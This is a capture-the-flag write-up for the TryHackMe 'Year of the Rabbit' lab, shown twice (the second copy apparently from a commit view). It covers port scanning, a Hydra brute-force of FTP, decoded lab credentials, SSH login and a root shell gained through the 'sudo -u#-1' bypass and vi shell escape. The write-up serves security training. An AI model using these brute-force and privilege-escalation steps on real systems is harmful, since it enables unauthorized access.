CTF-Writeups/TryHackMe/YearOfRabbit.md

# TryHackMe-YearOfRabbit

>Abdullah Rizwan | 09:12 PM , 18th October

## NMAP

```
Nmap scan report for 10.10.20.206
Host is up (0.17s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
|   2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
|   256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
|_  256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519)
80/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.81 seconds

```
## PORT 80

Looking at the souce and visiting `css` file we will find a hidden page `/sup3r_s3cret_fl4g/` that will say to turn off javascript. We will be brought up to a Rick rolled video.

## Burpsuite

Intercept the request on `/sup3r_s3cret_fl4g/` 

<img src="https://imgur.com/1Jzij6l"/>

<img src="https://imgur.com/hzYcZ0U"/>

Now visiting the page `/WExYY2Cv-qU`

We will find an image 

running `strings` on image

```
Eh, you've earned this. Username for FTP is ftpuser
One of these is the password:
Mou+56n%QK8sr
1618B0AUshw1M
A56IpIl%1s02u
vTFbDzX9&Nmu?
FfF~sfu^UQZmT
8FF?iKO27b~V0
ua4W~2-@y7dE$
3j39aMQQ7xFXT
Wb4--CTc4ww*-
u6oY9?nHv84D&
0iBp4W69Gr_Yf
TS*%miyPsGV54
C77O3FIy0c0sd
O14xEhgg0Hxz1
5dpv#Pr$wqH7F
1G8Ucoce1+gS5
0plnI%f0~Jw71
0kLoLzfhqq8u&
kS9pn5yiFGj6d
zeff4#!b5Ib_n
rNT4E4SHDGBkl
KKH5zy23+S0@B
3r6PHtM4NzJjE
gm0!!EC1A0I2?
HPHr!j00RaDEi
7N+J9BYSp4uaY
PYKt-ebvtmWoC
3TN%cD_E6zm*s
eo?@c!ly3&=0Z
nR8&FXz$ZPelN
eE4Mu53UkKHx#
86?004F9!o49d
SNGY0JjA5@0EE
trm64++JZ7R6E
3zJuGL~8KmiK^
CR-ItthsH%9du
yP9kft386bB8G
A-*eE3L@!4W5o
GoM^$82l&GA5D
1t$4$g$I+V_BH
0XxpTd90Vt8OL
j0CN?Z#8Bp69_
G#h~9@5E5QA5l
DRWNM7auXF7@j
Fw!if_=kk7Oqz
92d5r$uyw!vaE
c-AA7a2u!W2*?
zy8z3kBi#2e36
J5%2Hn+7I6QLt
gL$2fmgnq8vI*
Etb?i?Kj4R=QM
7CabD7kwY7=ri
4uaIRX~-cY6K4
kY1oxscv4EB2d
k32?3^x1ex7#o
ep4IPQ_=ku@V8
tQxFJ909rd1y2
5L6kpPR5E2Msn
65NX66Wv~oFP2
LRAQ@zcBphn!1
V4bt3*58Z32Xe
ki^t!+uqB?DyI
5iez1wGXKfPKQ
nJ90XzX&AnF5v
7EiMd5!r%=18c
wYyx6Eq-T^9#@
yT2o$2exo~UdW
ZuI-8!JyI6iRS
PTKM6RsLWZ1&^
3O$oC~%XUlRO@
KW3fjzWpUGHSW
nTzl5f=9eS&*W
WS9x0ZF=x1%8z
Sr4*E4NT5fOhS
hLR3xQV*gHYuC
4P3QgF5kflszS
NIZ2D%d58*v@R
0rJ7p%6Axm05K
94rU30Zx45z5c
Vi^Qf+u%0*q_S
1Fvdp&bNl3#&l
zLH%Ot0Bw&c%9
```

## Hydra
```
hydra -l ftpuser -P passwords.txt ftp://10.10.20.206 -t 4
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-10-18 22:06:01
[DATA] max 4 tasks per 1 server, overall 4 tasks, 82 login tries (l:1/p:82), ~21 tries per task
[DATA] attacking ftp://10.10.20.206:21/
[21][ftp] host: 10.10.20.206   login: ftpuser   password: 5iez1wGXKfPKQ
[STATUS] 82.00 tries/min, 82 tries in 00:01h, 1 to do in 00:01h, 3 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-10-18 22:07:03
```

## FTP

```
root@kali:~/TryHackMe/Easy/YearOfTheRabbit# ftp 10.10.20.206
Connected to 10.10.20.206.
220 (vsFTPd 3.0.2)
Name (10.10.20.206:root): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jan 23  2020 .
drwxr-xr-x    2 0        0            4096 Jan 23  2020 ..
-rw-r--r--    1 0        0             758 Jan 23  2020 Eli's_Creds.txt
226 Directory send OK.
ftp> 

```
On getting `Eli's_Creds.txt` we will find brainfuck language

```
+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+
++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---
--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++
+<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+
++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++
<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++
<]>+. <+++[ ->--- <]>-- ---.- ----. <
```
`https://www.dcode.fr/brainfuck-language`

on decoding it 

```
User: eli
Password: DSpDiM1wAEwid
```
This may be the ssh password for `eli`

## SSH

```
root@kali:~/TryHackMe/Easy/YearOfTheRabbit# ssh eli@10.10.20.206
The authenticity of host '10.10.20.206 (10.10.20.206)' can't be established.
ECDSA key fingerprint is SHA256:ISBm3muLdVA/w4A1cm7QOQQOCSMRlPdDp/x8CNpbJc8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.20.206' (ECDSA) to the list of known hosts.
eli@10.10.20.206's password: 


1 new message
Message from Root to Gwendoline:

"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"

END MESSAGE


eli@year-of-the-rabbit:~$ 


```


```
eli@year-of-the-rabbit:/home/gwendoline$ find / -type d -name "s3cr3t" 2>/dev/null
/usr/games/s3cr3t
```

```
 cat .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\! 
Your password is awful, Gwendoline. 
It should be at least 60 characters long! Not just MniVCQVhQHUNI
Honestly!

Yours sincerely
   -Root

```
## Previlege Escalation

```
sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
```
on the vim editor

:!sh

```
# bash
```
Add files via upload 2020-10-18 18:18:52 +00:00			`# TryHackMe-YearOfRabbit`

			`>Abdullah Rizwan \| 09:12 PM , 18th October`

			`## NMAP`

			```
			`Nmap scan report for 10.10.20.206`
			`Host is up (0.17s latency).`
			`Not shown: 997 closed ports`
			`PORT STATE SERVICE VERSION`
			`21/tcp open ftp vsftpd 3.0.2`
			`22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)`
			`\| ssh-hostkey:`
			`\| 1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)`
			`\| 2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)`
			`\| 256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)`
			`\|_ 256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519)`
			`80/tcp open http Apache httpd 2.4.10 ((Debian))`
			`\|_http-server-header: Apache/2.4.10 (Debian)`
			`\|_http-title: Apache2 Debian Default Page: It works`
			`Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel`

			`Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .`
			`Nmap done: 1 IP address (1 host up) scanned in 26.81 seconds`

			```
			`## PORT 80`

			Looking at the souce and visiting `css` file we will find a hidden page `/sup3r_s3cret_fl4g/` that will say to turn off javascript. We will be brought up to a Rick rolled video.

			`## Burpsuite`

			Intercept the request on `/sup3r_s3cret_fl4g/`

			`<img src="https://imgur.com/1Jzij6l"/>`

			`<img src="https://imgur.com/hzYcZ0U"/>`

			Now visiting the page `/WExYY2Cv-qU`

			`We will find an image`

			running `strings` on image

			```
			`Eh, you've earned this. Username for FTP is ftpuser`
			`One of these is the password:`
			`Mou+56n%QK8sr`
			`1618B0AUshw1M`
			`A56IpIl%1s02u`
			`vTFbDzX9&Nmu?`
			`FfF~sfu^UQZmT`
			`8FF?iKO27b~V0`
			`ua4W~2-@y7dE$`
			`3j39aMQQ7xFXT`
			`Wb4--CTc4ww*-`
			`u6oY9?nHv84D&`
			`0iBp4W69Gr_Yf`
			`TS*%miyPsGV54`
			`C77O3FIy0c0sd`
			`O14xEhgg0Hxz1`
			`5dpv#Pr$wqH7F`
			`1G8Ucoce1+gS5`
			`0plnI%f0~Jw71`
			`0kLoLzfhqq8u&`
			`kS9pn5yiFGj6d`
			`zeff4#!b5Ib_n`
			`rNT4E4SHDGBkl`
			`KKH5zy23+S0@B`
			`3r6PHtM4NzJjE`
			`gm0!!EC1A0I2?`
			`HPHr!j00RaDEi`
			`7N+J9BYSp4uaY`
			`PYKt-ebvtmWoC`
			`3TN%cD_E6zm*s`
			`eo?@c!ly3&=0Z`
			`nR8&FXz$ZPelN`
			`eE4Mu53UkKHx#`
			`86?004F9!o49d`
			`SNGY0JjA5@0EE`
			`trm64++JZ7R6E`
			`3zJuGL~8KmiK^`
			`CR-ItthsH%9du`
			`yP9kft386bB8G`
			`A-*eE3L@!4W5o`
			`GoM^$82l&GA5D`
			`1t$4$g$I+V_BH`
			`0XxpTd90Vt8OL`
			`j0CN?Z#8Bp69_`
			`G#h~9@5E5QA5l`
			`DRWNM7auXF7@j`
			`Fw!if_=kk7Oqz`
			`92d5r$uyw!vaE`
			`c-AA7a2u!W2*?`
			`zy8z3kBi#2e36`
			`J5%2Hn+7I6QLt`
			`gL$2fmgnq8vI*`
			`Etb?i?Kj4R=QM`
			`7CabD7kwY7=ri`
			`4uaIRX~-cY6K4`
			`kY1oxscv4EB2d`
			`k32?3^x1ex7#o`
			`ep4IPQ_=ku@V8`
			`tQxFJ909rd1y2`
			`5L6kpPR5E2Msn`
			`65NX66Wv~oFP2`
			`LRAQ@zcBphn!1`
			`V4bt3*58Z32Xe`
			`ki^t!+uqB?DyI`
			`5iez1wGXKfPKQ`
			`nJ90XzX&AnF5v`
			`7EiMd5!r%=18c`
			`wYyx6Eq-T^9#@`
			`yT2o$2exo~UdW`
			`ZuI-8!JyI6iRS`
			`PTKM6RsLWZ1&^`
			`3O$oC~%XUlRO@`
			`KW3fjzWpUGHSW`
			`nTzl5f=9eS&*W`
			`WS9x0ZF=x1%8z`
			`Sr4*E4NT5fOhS`
			`hLR3xQV*gHYuC`
			`4P3QgF5kflszS`
			`NIZ2D%d58*v@R`
			`0rJ7p%6Axm05K`
			`94rU30Zx45z5c`
			`Vi^Qf+u%0*q_S`
			`1Fvdp&bNl3#&l`
			`zLH%Ot0Bw&c%9`
			```

			`## Hydra`
			```
			`hydra -l ftpuser -P passwords.txt ftp://10.10.20.206 -t 4`
			`Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).`

			`Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-10-18 22:06:01`
			`[DATA] max 4 tasks per 1 server, overall 4 tasks, 82 login tries (l:1/p:82), ~21 tries per task`
			`[DATA] attacking ftp://10.10.20.206:21/`
			`[21][ftp] host: 10.10.20.206 login: ftpuser password: 5iez1wGXKfPKQ`
			`[STATUS] 82.00 tries/min, 82 tries in 00:01h, 1 to do in 00:01h, 3 active`
			`1 of 1 target successfully completed, 1 valid password found`
			`Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-10-18 22:07:03`
			```

			`## FTP`

			```
			`root@kali:~/TryHackMe/Easy/YearOfTheRabbit# ftp 10.10.20.206`
			`Connected to 10.10.20.206.`
			`220 (vsFTPd 3.0.2)`
			`Name (10.10.20.206:root): ftpuser`
			`331 Please specify the password.`
			`Password:`
			`230 Login successful.`
			`Remote system type is UNIX.`
			`Using binary mode to transfer files.`
			`ftp> ls -la`
			`200 PORT command successful. Consider using PASV.`
			`150 Here comes the directory listing.`
			`drwxr-xr-x 2 0 0 4096 Jan 23 2020 .`
			`drwxr-xr-x 2 0 0 4096 Jan 23 2020 ..`
			`-rw-r--r-- 1 0 0 758 Jan 23 2020 Eli's_Creds.txt`
			`226 Directory send OK.`
			`ftp>`

			```
			On getting `Eli's_Creds.txt` we will find brainfuck language

			```
			`+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-`
			`--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+`
			`++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+`
			`+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<`
			`]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+`
			`++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---`
			`--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++`
			`+<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+`
			`++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++`
			`<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++`
			`<]>+. <+++[ ->--- <]>-- ---.- ----. <`
			```
			`https://www.dcode.fr/brainfuck-language`

			`on decoding it`

			```
			`User: eli`
			`Password: DSpDiM1wAEwid`
			```
			This may be the ssh password for `eli`

			`## SSH`

			```
			`root@kali:~/TryHackMe/Easy/YearOfTheRabbit# ssh eli@10.10.20.206`
			`The authenticity of host '10.10.20.206 (10.10.20.206)' can't be established.`
			`ECDSA key fingerprint is SHA256:ISBm3muLdVA/w4A1cm7QOQQOCSMRlPdDp/x8CNpbJc8.`
			`Are you sure you want to continue connecting (yes/no/[fingerprint])? yes`
			`Warning: Permanently added '10.10.20.206' (ECDSA) to the list of known hosts.`
			`eli@10.10.20.206's password:`


			`1 new message`
			`Message from Root to Gwendoline:`

			`"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"`

			`END MESSAGE`




			`eli@year-of-the-rabbit:~$`


			```


			```
			`eli@year-of-the-rabbit:/home/gwendoline$ find / -type d -name "s3cr3t" 2>/dev/null`
			`/usr/games/s3cr3t`
			```

			```
			`cat .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\!`
			`Your password is awful, Gwendoline.`
			`It should be at least 60 characters long! Not just MniVCQVhQHUNI`
			`Honestly!`

			`Yours sincerely`
			`-Root`

			```
			`## Previlege Escalation`

			```
			`sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt`
			```
			`on the vim editor`

			`:!sh`

			```
			`# bash`
			```